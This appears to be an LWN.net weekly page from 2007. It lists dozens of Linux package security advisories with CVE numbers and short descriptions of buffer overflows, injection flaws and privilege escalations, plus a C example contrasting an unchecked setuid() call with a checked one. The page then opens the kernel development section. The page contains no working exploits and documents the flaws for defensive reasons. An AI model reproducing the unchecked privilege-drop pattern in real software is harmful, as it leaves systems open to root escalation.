| Description: | The AVI processing code in FFmpeg has a number of buffer overflow vulnerabilities. If an attacker can trick a user into loading a specially crafted AVI, arbitrary code can be executed with the user's privileges. |
Mozilla stuff: multiple vulnerabilities
freeradius: several vulnerabilities
| Package(s): | freeradius |
| CVE #(s): | CVE-2005-4745, CVE-2005-4746 |
| Created: | August 8, 2006 |
| Updated: | April 24, 2007 |
| Description: | Several remote vulnerabilities have been discovered in freeradius, a high-performance RADIUS server, which may lead to SQL injection or denial of service. |
freetype: integer overflows
| Package(s): | freetype |
| CVE #(s): | CVE-2006-0747, CVE-2006-1861, CVE-2006-2493, CVE-2006-2661, CVE-2006-3467 |
| Created: | June 8, 2006 |
| Updated: | June 1, 2010 |
| Description: | The FreeType library has several integer overflow vulnerabilities. If a user can be tricked into installing a specially crafted font file, arbitrary code can be executed with the privilege of the user. |
ftpd: privilege escalation
| Package(s): | ftpd |
| CVE #(s): | CVE-2006-5778 |
| Created: | November 10, 2006 |
| Updated: | February 14, 2007 |
| Description: | Ftpd is vulnerable to a privilege escalation attack: an incorrect seteuid() call can be used by an FTP user to gain unauthorized access to files or directories. |
gcc: file overwrite vulnerability
| Package(s): | gcc |
| CVE #(s): | CVE-2006-3619 |
| Created: | September 6, 2006 |
| Updated: | March 14, 2008 |
| Description: | The fastjar utility found in the GNU compiler collection does not perform adequate file path checking, allowing the creation or overwriting of files outside of the current directory tree. |
gd: buffer overflow
| Package(s): | gd |
| CVE #(s): | CVE-2007-0455 |
| Created: | February 7, 2007 |
| Updated: | November 18, 2009 |
| Description: | The gd graphics library contains a buffer overflow which could enable a remote attacker to execute arbitrary code. Note that various other packages include code from gd and could also be vulnerable. |
gdb: buffer overflow
| Package(s): | gdb |
| CVE #(s): | CVE-2006-4146 |
| Created: | September 15, 2006 |
| Updated: | June 12, 2007 |
| Description: | A buffer overflow in dwarfread.c and dwarf2read.c debugging code in GNU Debugger (GDB) 6.5 allows user-assisted attackers, or restricted users, to execute arbitrary code via a crafted file with a location block (DW_FORM_block) that contains a large number of operations. |
gdm: improper file permissions
| Package(s): | gdm |
| CVE #(s): | CVE-2006-1057 |
| Created: | April 19, 2006 |
| Updated: | May 2, 2007 |
| Description: | The .ICEauthority file may be created with the wrong ownership and permissions; gdm 2.14.2 fixes the problem. |
gedit: format string vulnerability
| Package(s): | gedit |
| CVE #(s): | CAN-2005-1686 |
| Created: | June 9, 2005 |
| Updated: | February 5, 2009 |
| Description: | A format string vulnerability has been discovered in gedit. Calling the program with specially crafted file names caused a buffer overflow, which could be exploited to execute arbitrary code with the privileges of the gedit user. |
gnupg: stack overwrite
| Package(s): | gnupg |
| CVE #(s): | CVE-2006-6235 |
| Created: | December 12, 2006 |
| Updated: | March 13, 2007 |
| Description: | A "stack overwrite" vulnerability in GnuPG (gpg) allows attackers to execute arbitrary code via crafted OpenPGP packets that cause GnuPG to dereference a function pointer from deallocated stack memory. |
grip: buffer overflow
| Package(s): | grip |
| CVE #(s): | CAN-2005-0706 |
| Created: | March 10, 2005 |
| Updated: | November 19, 2008 |
| Description: | Grip, a CD ripper, has a buffer overflow vulnerability that can occur when the CDDB server returns more than 16 matches. |
gtk2: denial of service
| Package(s): | gtk2 |
| CVE #(s): | CVE-2007-0010 |
| Created: | January 24, 2007 |
| Updated: | February 8, 2007 |
| Description: | From the Red Hat advisory: "A bug was found in the way the gtk2 GdkPixbufLoader() function processed invalid input. Applications linked against gtk2 could crash if they loaded a malformed image file." |
gv: stack-based buffer overflow
| Package(s): | gv |
| CVE #(s): | CVE-2006-5864 |
| Created: | November 20, 2006 |
| Updated: | April 9, 2007 |
| Description: | Stack-based buffer overflow in the ps_gettext function in ps.c for GNU gv 3.6.2, and possibly earlier versions, allows user-assisted attackers to execute arbitrary code via a PostScript (PS) file with certain headers that contain long comments, as demonstrated using the DocumentMedia header. |
gzip: multiple vulnerabilities
| Package(s): | gzip |
| CVE #(s): | CVE-2006-4334, CVE-2006-4335, CVE-2006-4336, CVE-2006-4337, CVE-2006-4338 |
| Created: | September 19, 2006 |
| Updated: | January 20, 2010 |
| Description: | Tavis Ormandy of the Google Security Team discovered two denial of service flaws in the way gzip expanded archive files. If a victim expanded a specially crafted archive, it could cause the gzip executable to hang or crash. Tavis Ormandy of the Google Security Team also discovered several code execution flaws in the way gzip expanded archive files. If a victim expanded a specially crafted archive, it could cause the gzip executable to crash or execute arbitrary code. |
horde-kronolith: local file inclusion
| Package(s): | horde-kronolith |
| CVE #(s): | CVE-2006-6175 |
| Created: | January 17, 2007 |
| Updated: | March 7, 2008 |
| Description: | Kronolith contains a mistake in lib/FBView.php where a raw, unfiltered string is used instead of a sanitized string to view local files. An authenticated attacker could craft an HTTP GET request that uses directory traversal techniques to execute any file on the web server as PHP code, which could allow information disclosure or arbitrary code execution with the rights of the user running the PHP application (usually the webserver user). |
imagemagick: buffer overflows
| Package(s): | imagemagick |
| CVE #(s): | CVE-2006-5868 |
| Created: | November 28, 2006 |
| Updated: | February 16, 2007 |
| Description: | Daniel Kobras discovered multiple buffer overflows in ImageMagick's SGI file format decoder. By tricking a user or an automated system into processing a specially crafted SGI image, this could be exploited to execute arbitrary code with the user's privileges. |
ImageMagick: buffer overflows
| Package(s): | ImageMagick |
| CVE #(s): | CVE-2006-5456 |
| Created: | October 31, 2006 |
| Updated: | March 8, 2007 |
| Description: | Multiple buffer overflows in GraphicsMagick before 1.1.7 and ImageMagick 6.0.7 allow user-assisted attackers to cause a denial of service and possibly execute arbitrary code via (1) a DCM image that is not properly handled by the ReadDCMImage function in coders/dcm.c, or (2) a PALM image that is not properly handled by the ReadPALMImage function in coders/palm.c. |
imlib2: arbitrary code execution
| Package(s): | imlib2 |
| CVE #(s): | CVE-2006-4806, CVE-2006-4807, CVE-2006-4808, CVE-2006-4809 |
| Created: | November 6, 2006 |
| Updated: | August 13, 2007 |
| Description: | M. Joonas Pihlaja discovered that imlib2 did not sufficiently verify the validity of ARGB, JPG, LBM, PNG, PNM, TGA, and TIFF images. If a user were tricked into viewing or processing a specially crafted image with an application that uses imlib2, the flaws could be exploited to execute arbitrary code with the user's privileges. |
java: multiple vulnerabilities
| Package(s): | java |
| CVE #(s): | CVE-2006-4339, CVE-2006-4790, CVE-2006-6731, CVE-2006-6736, CVE-2006-6737, CVE-2006-6745 |
| Created: | January 18, 2007 |
| Updated: | June 4, 2010 |
| Description: | Java has multiple vulnerabilities, including: an RSA exponent padding attack vulnerability, two vulnerabilities which allow untrusted applets to access data in other applets, vulnerabilities that involve applets gaining privileges due to serialization bugs in the JRE, and buffer overflows in the Java image handling routines that can give attackers read/write/execute capabilities for local files. |
kdelibs: integer overflow
| Package(s): | kdelibs |
| CVE #(s): | CVE-2006-4811 |
| Created: | October 18, 2006 |
| Updated: | March 5, 2007 |
| Description: | The KDE khtml library can pass untrusted parameters into Qt, allowing a hostile user to trigger an integer overflow there and execute arbitrary code. |
kdelibs: kate backup file permission leak
| Package(s): | kdelibs kate kwrite |
| CVE #(s): | CAN-2005-1920 |
| Created: | July 19, 2005 |
| Updated: | September 21, 2010 |
| Description: | Kate / Kwrite, as shipped with KDE 3.2.x up to and including 3.4.0, creates a file backup before saving a modified file. These backup files are created with default permissions, even if the original file had more strict permissions set. See this advisory for more information. |
kdelibs: cross-site scripting
| Package(s): | kdelibs konqueror |
| CVE #(s): | CVE-2007-0537 |
| Created: | February 5, 2007 |
| Updated: | August 13, 2007 |
| Description: | Konqueror 3.5.5 does not properly parse HTML comments, which allows remote attackers to conduct cross-site scripting (XSS) attacks and bypass some XSS protection schemes by embedding certain HTML tags within a comment, a related issue to CVE-2007-0478. |
kernel: denial of service
| Package(s): | kernel |
| CVE #(s): | CVE-2006-4623 |
| Created: | October 18, 2006 |
| Updated: | November 14, 2007 |
| Description: | The kernel DVB layer can be caused to crash with maliciously-formatted unidirectional lightweight encapsulation (ULE) data. |
kernel: denial of service
| Package(s): | kernel |
| CVE #(s): | CVE-2006-4535, CVE-2006-4538 |
| Created: | September 18, 2006 |
| Updated: | January 5, 2009 |
| Description: | Sridhar Samudrala discovered a local denial of service vulnerability in the handling of SCTP sockets. By opening such a socket with a special SO_LINGER value, a local attacker could exploit this to crash the kernel. (CVE-2006-4535) Kirill Korotaev discovered that the ELF loader on the ia64 and sparc platforms did not sufficiently verify the memory layout. By attempting to execute a specially crafted executable, a local user could exploit this to crash the kernel. (CVE-2006-4538) |
kernel: denial of service by memory consumption
| Package(s): | kernel |
| CVE #(s): | CVE-2006-2936 |
| Created: | July 17, 2006 |
| Updated: | November 14, 2007 |
| Description: | The ftdi_sio driver (usb/serial/ftdi_sio.c) in Linux kernel 2.6.x up to 2.6.17, and possibly later versions, allows local users to cause a denial of service (memory consumption) by writing more data to the serial port than the driver can handle, which causes the data to be queued. |
kernel: denial of service
| Package(s): | kernel |
| CVE #(s): | CVE-2006-5757 |
| Created: | November 13, 2006 |
| Updated: | November 14, 2007 |
| Description: | From the MOKB-05-11-2006 advisory: "The ISO9660 filesystem handling code of the Linux 2.6.x kernel fails to properly handle corrupted data structures, leading to an exploitable denial of service condition. This particular vulnerability seems to be caused by a race condition and a signedness issue. When performing a read operation on a corrupted ISO9660 fs stream, the isofs_get_blocks() function will enter an infinite loop when __find_get_block_slow() callback from sb_getblk() fails ("due to various races between file io on the block device and getblk")." |
kernel: denial of service
| Package(s): | kernel |
| CVE #(s): | CVE-2006-2935, CVE-2006-4145, CVE-2006-3745 |
| Created: | September 1, 2006 |
| Updated: | July 30, 2008 |
| Description: | Previous versions of the kernel package are subject to several vulnerabilities. Certain malformed UDF filesystems can cause the system to crash (denial of service). Malformed CDROM firmware or USB storage devices (such as USB keys) could cause system crash (denial of service), and if they were intentionally malformed, can cause arbitrary code to run with elevated privileges. In addition, the SCTP protocol is subject to a remote system crash (denial of service) attack. |
kernel: multiple vulnerabilities
| Package(s): | kernel |
| CVE #(s): | CVE-2006-5749, CVE-2006-4814, CVE-2006-6106 |
| Created: | January 5, 2007 |
| Updated: | January 8, 2009 |
| Description: | A security issue has been reported in Linux kernel due to an error in drivers/isdn/i4l/isdn_ppp.c as the "isdn_ppp_ccp_reset_alloc_state()" function never initializes an event timer before scheduling it with the "add_timer()" function. The mincore function in the kernel does not properly lock access to user space, which has unspecified impact and attack vectors, possibly related to a deadlock. Another vulnerability has been reported in Linux kernel caused by a boundary error within the handling of incoming CAPI messages in net/bluetooth/cmtp/capi.c. This can be exploited to overwrite certain Kernel data structures. |
koffice: integer overflow
| Package(s): | koffice |
| CVE #(s): | CVE-2006-6120 |
| Created: | November 30, 2006 |
| Updated: | February 20, 2007 |
| Description: | The KOffice office suite has an integer overflow vulnerability. If an attacker can trick a user into opening a specially crafted PowerPoint (PPT) file, KOffice can be caused to crash or possibly execute arbitrary code with the user's privileges. |
krb5: uninitialized pointers
| Package(s): | krb5 |
| CVE #(s): | CVE-2006-6143, CVE-2006-3084 |
| Created: | January 10, 2007 |
| Updated: | July 7, 2010 |
| Description: | The kadmind daemon can, in some situations, perform operations on uninitialized pointers. This bug could conceivably open up the system to a code execution attack by an unauthenticated remote attacker, but it appears to be difficult to exploit. See this advisory for details. |
krb5: local privilege escalation
| Package(s): | krb5 |
| CVE #(s): | CVE-2006-3083 |
| Created: | August 9, 2006 |
| Updated: | July 7, 2010 |
| Description: | Some kerberos applications fail to check the results of setuid() calls, with the result that, if that call fails, they could continue to execute as root after thinking they had switched to a nonprivileged user. A local attacker who can cause these calls to fail (through resource exhaustion, presumably) could exploit this bug to gain root privileges. |
libgadu: memory alignment bug
| Package(s): | libgadu |
| CVE #(s): | CAN-2005-2370 |
| Created: | July 29, 2005 |
| Updated: | June 25, 2007 |
| Description: | Szymon Zygmunt and Michal Bartoszkiewicz discovered a memory alignment error in libgadu (from ekg, the console Gadu Gadu client, an instant messaging program), which is included in gaim, a multi-protocol instant messaging client, as well. This cannot be exploited on the x86 architecture, but on others, e.g. SPARC, it can lead to a bus error, in other words a denial of service. |
libgtop2: buffer overflow
| Package(s): | libgtop2 |
| CVE #(s): | CVE-2007-0235 |
| Created: | January 15, 2007 |
| Updated: | August 9, 2007 |
| Description: | The /proc parsing routines in libgtop are vulnerable to a buffer overflow. If an attacker can run a process in a specially crafted long path, then trick a user into running gnome-system-monitor, arbitrary code can be executed with the user's privileges. |
libmodplug: boundary errors
| Package(s): | libmodplug |
| CVE #(s): | CVE-2006-4192 |
| Created: | December 11, 2006 |
| Updated: | May 4, 2011 |
| Description: | Luigi Auriemma has reported various boundary errors in load_it.cpp and a boundary error in the "CSoundFile::ReadSample()" function in sndfile.cpp. A remote attacker can entice a user to read crafted modules or ITP files, which may trigger a buffer overflow resulting in the execution of arbitrary code with the privileges of the user running the application. |
libpng: buffer overflow
| Package(s): | libpng |
| CVE #(s): | CVE-2006-3334 |
| Created: | July 19, 2006 |
| Updated: | December 15, 2008 |
| Description: | In pngrutil.c, the function png_decompress_chunk() allocates insufficient space for an error message, potentially overwriting stack data, leading to a buffer overflow. |
libpng: heap based buffer overflow
| Package(s): | libpng |
| CVE #(s): | CVE-2006-0481 |
| Created: | February 13, 2006 |
| Updated: | December 15, 2008 |
| Description: | A heap based buffer overflow bug was found in the way libpng strips alpha channels from a PNG image. An attacker could create a carefully crafted PNG image file in such a way that it could cause an application linked with libpng to crash or execute arbitrary code when the file is opened by a victim. |
libtiff: buffer overflow
| Package(s): | libtiff |
| CVE #(s): | CVE-2006-2193 |
| Created: | June 15, 2006 |
| Updated: | September 1, 2008 |
| Description: | The t2p_write_pdf_string function in libtiff 3.8.2 and earlier is vulnerable to a buffer overflow. Attackers can use a TIFF file with UTF-8 characters in the DocumentName tag to overflow a buffer, causing a denial of service, and possibly the execution of arbitrary code. |
libvncserver: authentication bypass
| Package(s): | libvncserver |
| CVE #(s): | CVE-2006-2450 |
| Created: | August 4, 2006 |
| Updated: | March 19, 2007 |
| Description: | LibVNCServer fails to properly validate protocol types, effectively letting users decide what protocol to use, such as "Type 1 - None". LibVNCServer will accept this security type, even if it is not offered by the server. |
libxml2: arbitrary code execution
| Package(s): | libxml2 |
| CVE #(s): | CAN-2004-0110 |
| Created: | February 26, 2004 |
| Updated: | August 19, 2009 |
| Description: | Yuuichi Teranishi discovered a flaw in libxml2 versions prior to 2.6.6. When fetching a remote resource via FTP or HTTP, libxml2 uses special parsing routines. These routines can overflow a buffer if passed a very long URL. If an attacker is able to find an application using libxml2 that parses remote resources and allows them to influence the URL, then this flaw could be used to execute arbitrary code. |
libxml2: multiple buffer overflows
| Package(s): | libxml2 |
| CVE #(s): | CAN-2004-0989 |
| Created: | October 28, 2004 |
| Updated: | August 19, 2009 |
| Description: | libxml2 prior to version 2.6.14 has multiple buffer overflow vulnerabilities; if a local user passes a specially crafted FTP URL, arbitrary code may be executed. |
lynx: arbitrary command execution
| Package(s): | lynx |
| CVE #(s): | CVE-2005-2929 |
| Created: | November 14, 2005 |
| Updated: | September 14, 2009 |
| Description: | An arbitrary command execution bug was found in the lynx "lynxcgi:" URI handler. An attacker could create a web page redirecting to a malicious URL which could execute arbitrary code as the user running lynx. |
mpg123: denial of service
| Package(s): | mpg123 |
| CVE #(s): | CVE-2007-0578 |
| Created: | February 5, 2007 |
| Updated: | February 7, 2007 |
| Description: | The http_open function in httpget.c in mpg123 before 0.64 allows remote attackers to cause a denial of service (infinite loop) by closing the HTTP connection early. |
mysql: format string bug
| Package(s): | mysql |
| CVE #(s): | CVE-2006-3469 |
| Created: | July 21, 2006 |
| Updated: | July 30, 2008 |
| Description: | Jean-David Maillefer discovered a format string bug in the date_format() function's error reporting. By calling the function with invalid arguments, an authenticated user could exploit this to crash the server. |
MySQL: privilege violations
| Package(s): | mysql |
| CVE #(s): | CVE-2006-4031, CVE-2006-4226 |
| Created: | August 25, 2006 |
| Updated: | July 30, 2008 |
| Description: | MySQL 4.1 before 4.1.21 and 5.0 before 5.0.24 allows a local user to access a table through a previously created MERGE table, even after the user's privileges are revoked for the original table, which might violate intended security policy (CVE-2006-4031). MySQL 4.1 before 4.1.21, 5.0 before 5.0.25, and 5.1 before 5.1.12, when run on case-sensitive filesystems, allows remote authenticated users to create or access a database when the database name differs only in case from a database for which they have permissions (CVE-2006-4226). |
MySQL: logging bypass
| Package(s): | mysql |
| CVE #(s): | CVE-2006-0903 |
| Created: | April 4, 2006 |
| Updated: | May 21, 2008 |
| Description: | MySQL 5.0.18 and earlier allows local users to bypass logging mechanisms via SQL queries that contain the NULL character, which are not properly handled by the mysql_real_query function. NOTE: this issue was originally reported for the mysql_query function, but the vendor states that since mysql_query expects a null character, this is not an issue for mysql_query. |
nbd: arbitrary code execution
| Package(s): | nbd |
| CVE #(s): | CVE-2005-3534 |
| Created: | January 6, 2006 |
| Updated: | March 7, 2011 |
| Description: | Kurt Fitzner discovered that the NBD (network block device) server did not correctly verify the maximum size of request packets. By sending specially crafted large request packets, a remote attacker who is allowed to access the server could exploit this to execute arbitrary code with root privileges. |
ncompress: buffer underflow
| Package(s): | ncompress |
| CVE #(s): | CVE-2006-1168 |
| Created: | August 10, 2006 |
| Updated: | February 21, 2012 |
| Description: | The ncompress compression utility has a missing boundary check. A local user can use a maliciously created file to cause a .bss buffer underflow. |
openldap: security bypass
| Package(s): | openldap |
| CVE #(s): | CVE-2006-4600 |
| Created: | September 29, 2006 |
| Updated: | June 12, 2007 |
| Description: | slapd in OpenLDAP before 2.3.25 allows remote authenticated users with selfwrite Access Control List (ACL) privileges to modify arbitrary Distinguished Names (DN). |
OpenSSH: denial of service
| Package(s): | openssh |
| CVE #(s): | CVE-2006-4925, CVE-2006-5052 |
| Created: | October 6, 2006 |
| Updated: | November 15, 2007 |
| Description: | packet.c in ssh in OpenSSH allows remote attackers to cause a denial of service (crash) by sending an invalid protocol sequence with USERAUTH_SUCCESS before NEWKEYS, which causes newkeys[mode] to be NULL. An unspecified vulnerability in portable OpenSSH before 4.4, when running on some platforms, allows remote attackers to determine the validity of usernames via unknown vectors involving a GSSAPI "authentication abort." |
openssh: privilege separation issue
| Package(s): | openssh |
| CVE #(s): | CVE-2006-5794 |
| Created: | November 8, 2006 |
| Updated: | April 5, 2007 |
| Description: | From the OpenSSH 4.5 announcement: "Fix a bug in the sshd privilege separation monitor that weakened its verification of successful authentication. This bug is not known to be exploitable in the absence of additional vulnerabilities." |
openssh: remote denial of service
| Package(s): | openssh |
| CVE #(s): | CVE-2006-4924, CVE-2006-5051 |
| Created: | September 27, 2006 |
| Updated: | September 17, 2008 |
| Description: | OpenSSH 4.4 fixes some security issues, including a pre-authentication denial of service, an unsafe signal handler, and, in portable OpenSSH, a GSSAPI authentication abort that could be used to determine the validity of usernames on some platforms. |
php: several vulnerabilities
| Package(s): | php |
| CVE #(s): | CVE-2006-4481, CVE-2006-4484, CVE-2006-4485 |
| Created: | September 8, 2006 |
| Updated: | June 13, 2008 |
| Description: | The file_exists and imap_reopen functions in PHP before 5.1.5 do not check for the safe_mode and open_basedir settings, which allows local users to bypass the settings (CVE-2006-4481). A buffer overflow in the LWZReadByte function in ext/gd/libgd/gd_gif_in.c in the GD extension in PHP before 5.1.5 allows remote attackers to have an unknown impact via a GIF file with input_code_size greater than MAX_LWZ_BITS, which triggers an overflow when initializing the table array (CVE-2006-4484). The stripos function in PHP before 5.1.5 has unknown impact and attack vectors related to an out-of-bounds read (CVE-2006-4485). |
php: buffer overflows
| Package(s): | php |
| CVE #(s): | CVE-2006-5465 |
| Created: | November 3, 2006 |
| Updated: | January 18, 2010 |
| Description: | The Hardened-PHP Project discovered buffer overflows in the htmlentities/htmlspecialchars routines internal to the PHP Project. Of course the whole purpose of these functions is to be filled with user input. (The overflow can only occur when UTF-8 is used.) |
phpbb2: missing input sanitizing
| Package(s): | phpbb2 |
CVE #(s): | CVE-2006-1896
|
| Created: | May 22, 2006 |
Updated: | February 11, 2008 |
| Description: |
It was discovered that phpbb2, a web based bulletin board, insufficiently
sanitizes values passed to the "Font Color 3" setting, which might lead to
the execution of injected code by admin users. |
| Alerts: |
|
Comments (none posted)
phpbb2: multiple vulnerabilities
| Package(s): | phpbb2 |
CVE #(s): | CVE-2005-3310
CVE-2005-3415
CVE-2005-3416
CVE-2005-3417
CVE-2005-3418
CVE-2005-3419
CVE-2005-3420
CVE-2005-3536
CVE-2005-3537
|
| Created: | December 22, 2005 |
Updated: | February 11, 2008 |
| Description: |
The phpbb2 web forum has a number of vulnerabilities including:
a web script injection problem, a protection mechanism bypass, a
security check bypass, a remote global variable bypass, cross site
scripting vulnerabilities, an SQL injection vulnerability,
a remote regular expression modification problem, missing input
sanitizing, and a missing request validation problem. |
| Alerts: |
|
Comments (none posted)
postgresql: insufficient verification
| Package(s): | postgresql |
CVE #(s): | CVE-2007-0555
CVE-2007-0556
|
| Created: | February 5, 2007 |
Updated: | March 19, 2007 |
| Description: |
PostgreSQL has two vulnerabilities that allow an authenticated attacker
with the permissions to run arbitrary SQL to launch a denial-of-service
attack or possibly read out random chunks of memory. Since attacks
require authenticated access, the security hole is only considered medium
risk. See the announcement for additional
information. |
| Alerts: |
|
Comments (none posted)
postgresql: SQL injection
| Package(s): | postgresql |
CVE #(s): | CVE-2006-2313
CVE-2006-2314
|
| Created: | May 24, 2006 |
Updated: | June 6, 2007 |
| Description: |
The PostgreSQL team has put out a set of "urgent updates" (in the form of the 7.3.15, 7.4.13, 8.0.8, and 8.1.4 releases) closing a
newly-discovered set of SQL injection issues. Details about the problem
can be found on the
technical information page; in short: multi-byte encodings can be used
to defeat normal string sanitizing techniques. The update fixes one problem
related to invalid multi-byte characters, but punts on another by simply
disallowing the old, unsafe technique of escaping single quotes with a
backslash. |
| Alerts: |
|
Comments (1 posted)
proftpd: stack-based buffer overflow
| Package(s): | proftpd |
CVE #(s): | CVE-2006-6563
|
| Created: | December 18, 2006 |
Updated: | February 14, 2007 |
| Description: |
A vulnerability exists in the FTP server ProFTPD, versions up to and
including 1.3.0a. The vulnerability is caused by a stack-based buffer
overflow in the "pr_ctrls_recv_request" function of the "Controls"
feature. This is an optional feature of ProFTPD server which is by default
disabled in OpenPKG and probably other distributions. |
| Alerts: |
|
Comments (1 posted)
quake: buffer overflow
| Package(s): | quake3-bin |
CVE #(s): | CVE-2006-2236
|
| Created: | May 10, 2006 |
Updated: | January 12, 2009 |
| Description: |
Games based on the Quake 3 engine are vulnerable to a buffer overflow exploitable by a hostile game server. |
| Alerts: |
|
Comments (none posted)
rpm: arbitrary code execution
| Package(s): | rpm |
CVE #(s): | CVE-2006-5466
|
| Created: | November 6, 2006 |
Updated: | August 28, 2007 |
| Description: |
An error was found in the RPM library's handling of query reports. In
some locales, certain RPM packages would cause the library to crash. If
a user was tricked into querying a specially crafted RPM package, the
flaw could be exploited to execute arbitrary code with the user's
privileges. |
| Alerts: |
|
Comments (none posted)
samba: several vulnerabilities
Comments (none posted)
shadow-utils: mailbox creation vulnerability
| Package(s): | shadow-utils |
CVE #(s): | CVE-2006-1174
|
| Created: | May 25, 2006 |
Updated: | June 12, 2007 |
| Description: |
The useradd tool from the shadow-utils package has a potential security
problem. When a new user's mailbox is created, the permissions are
set to random garbage from the stack, potentially allowing the
file to be read or written during the time before fchmod() is called. |
| Alerts: |
|
Comments (none posted)
thttpd: remote file access
| Package(s): | thttpd |
CVE #(s): | |
| Created: | February 1, 2007 |
Updated: | February 7, 2007 |
| Description: |
The start-stop-daemon command from thttpd performs a chdir to /, which
allows all files that are readable by the thttpd
process to be remotely accessed by unauthenticated users. |
| Alerts: |
|
Comments (none posted)
ulogd: buffer overflow
| Package(s): | ulogd |
CVE #(s): | CVE-2007-0460
|
| Created: | January 29, 2007 |
Updated: | March 19, 2007 |
| Description: |
A buffer overflow in ulogd has an unknown impact and attack vectors related
to "improper string length calculations." |
| Alerts: |
|
Comments (none posted)
unzip: long file name buffer overflow
| Package(s): | unzip |
CVE #(s): | CVE-2005-4667
|
| Created: | February 6, 2006 |
Updated: | May 2, 2007 |
| Description: |
A buffer overflow in UnZip 5.50 and earlier allows local users to execute
arbitrary code via a long filename command line argument. NOTE: since the
overflow occurs in a non-setuid program, there are not many scenarios under
which it poses a vulnerability, unless unzip is passed long arguments when
it is invoked from other programs. |
| Alerts: |
|
Comments (1 posted)
w3c-libwww: possible stack overflow
| Package(s): | w3c-libwww |
CVE #(s): | CVE-2005-3183
|
| Created: | October 14, 2005 |
Updated: | May 2, 2007 |
| Description: |
Extensive testing of libwww's handling of multipart/byteranges content from
HTTP/1.1 servers revealed multiple logical flaws and bugs in
Library/src/HTBound.c. |
| Alerts: |
|
Comments (1 posted)
wireshark: multiple vulnerabilities
Comments (6 posted)
xine: format string vulnerabilities
| Package(s): | xine |
CVE #(s): | CVE-2007-0017
|
| Created: | January 23, 2007 |
Updated: | August 10, 2007 |
| Description: |
Multiple format string vulnerabilities in (1) the cdio_log_handler function
in modules/access/cdda/access.c in the CDDA (libcdda_plugin) plugin, and
the (2) cdio_log_handler and (3) vcd_log_handler functions in
modules/access/vcdx/access.c in the VCDX (libvcdx_plugin) plugin, in
VideoLAN VLC 0.7.0 through 0.8.6 allow user-assisted remote attackers to
execute arbitrary code via format string specifiers in an invalid URI, as
demonstrated by a udp://-- URI in an M3U file. |
| Alerts: |
|
Comments (none posted)
xine-lib: buffer overflow
| Package(s): | xine-lib |
CVE #(s): | CVE-2006-6172
|
| Created: | December 5, 2006 |
Updated: | June 5, 2007 |
| Description: |
A buffer overflow was discovered in the Real Media input plugin in
xine-lib. If a user were tricked into loading a specially crafted stream
from a malicious server, the attacker could execute arbitrary code with the
user's privileges. |
| Alerts: |
|
Comments (none posted)
xine-lib: buffer overflow
| Package(s): | xine-lib |
CVE #(s): | CVE-2006-1664
|
| Created: | April 27, 2006 |
Updated: | February 27, 2008 |
| Description: |
xine-lib does an improper input data boundary check on
MPEG streams. A specially crafted MPEG file can be
created that can cause arbitrary code execution when the
file is accessed. |
| Alerts: |
|
Comments (none posted)
xinit: race condition
| Package(s): | xinit |
CVE #(s): | CVE-2006-5214
|
| Created: | October 17, 2006 |
Updated: | August 9, 2007 |
| Description: |
A race condition allows local users to see error messages generated during
another user's X session. This could allow potentially sensitive
information to be leaked. |
| Alerts: |
|
Comments (1 posted)
X.org: local privilege escalations
| Package(s): | xorg-x11 |
CVE #(s): | CVE-2006-4447
|
| Created: | August 28, 2006 |
Updated: | April 30, 2007 |
| Description: |
Several X.org libraries and X.org itself contain system calls to
set*uid() functions, without checking their result. Local users could
deliberately exceed their assigned resource limits and elevate their
privileges after an unsuccessful set*uid() system call. This requires
resource limits to be enabled on the machine. |
| Alerts: |
|
Comments (none posted)
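The check this entry is about, as an added example rather than X.org code: the pattern of ignoring the set*uid() result beside a hardened form that fails closed and confirms the identity change. Function names are hypothetical.

```c
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>

/* The pattern the advisory describes: the result of setuid() is thrown away.
   With resource limits enabled the kernel can refuse the change, and the
   caller then carries on believing it dropped privileges while still
   running with its original (root) identity. */
void drop_privileges_unchecked(uid_t uid)
{
    (void)setuid(uid);              /* status ignored: the unsafe form */
}

/* Hardened form: fail closed on a non-zero result, then confirm through
   getuid()/geteuid() that the identity really changed.  Returns 0 on
   success and -1 with errno set otherwise; a caller should exit, not
   continue, when this fails. */
int drop_privileges_checked(uid_t uid)
{
    if (setuid(uid) != 0)
        return -1;                  /* errno as set by the kernel */
    if (getuid() != uid || geteuid() != uid) {
        errno = EPERM;              /* call returned 0 but identity is wrong */
        return -1;
    }
    return 0;
}
```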
X.org: integer overflows
| Package(s): | xorg, xorg-server |
CVE #(s): | CVE-2006-6101
CVE-2006-6102
CVE-2006-6103
|
| Created: | January 10, 2007 |
Updated: | March 8, 2007 |
| Description: |
A number of integer overflows have turned up in the X.org server. Some of these overflows involve calls to alloca(), and thus make corruption of the stack relatively easy. This vulnerability is exploitable by anybody who can make a connection to the server, meaning that it is a local root exploit in most settings. See this advisory for details. |
| Alerts: |
|
Comments (none posted)
xpdf: buffer overflow
| Package(s): | xpdf |
CVE #(s): | CAN-2005-0064
|
| Created: | January 19, 2005 |
Updated: | March 15, 2007 |
| Description: |
iDEFENSE has found yet another xpdf buffer overflow; see this advisory for details. |
| Alerts: |
|
Comments (1 posted)
Page editor: Jonathan Corbet
Kernel development
Brief items
The current 2.6 kernel remains 2.6.20; no 2.6.21 prepatches have
been released. Patches are flowing into the mainline git repository,
however - see below for the highlights.
For older kernels: 2.6.16.40 was released on
February 10 with a relatively small number of patches.
The first 2.4.35 prepatch is
now available; it contains a few fixes and a backport of the 2.6 "sky2"
network driver.
Comments (none posted)
Kernel development news
I'm sorry, but could we please not mix the kernel with Vogon poetry
contest?
-- Al Viro
I have an email sitting in my drafts folder stating that I'll no
longer accept any features unless they've been publicly reviewed
in detail and run-time tested by a third party. The idea being to
force people to spend more time reviewing and testing each other's
stuff and less time writing new stuff. Maybe on a sufficiently
gloomy day I'll actually send it.
-- Andrew Morton
Comments (none posted)
As of this writing, the 2.6.21 merge window is wide open. Something over
2,300 changesets have been merged, making changes all over the tree. This
article summarizes the major changes merged so far for the 2.6.21 release.
User-visible changes include:
- A big ACPI update with sysfs support for backlight devices, a
simplified table manager which adds more functionality with less code,
the removal of 16-bit support, experimental support for removable
drive bays, and more.
- New device drivers add support for Silan SC92031 network interface
chips, Qlogic 4032 NIC chips, PA Semi PWRficient Ethernet chips,
Avocent PC300/RSV and PC300/X21 WAN cards, Atmel MACB network
controllers, Yukon Extreme Ethernet chips, several USB-attached NCR
printers, Chelsio T3 10G Ethernet adapters, GTCO CalComp tablets,
Delkin compact flash adapters, Attansic L1 Gigabit Ethernet adapters,
VIA VT1708(a) HD audio codecs, several auxiliary LCD display devices,
PC-style CMOS real-time clocks, SNI RM 53c710 SCSI controllers,
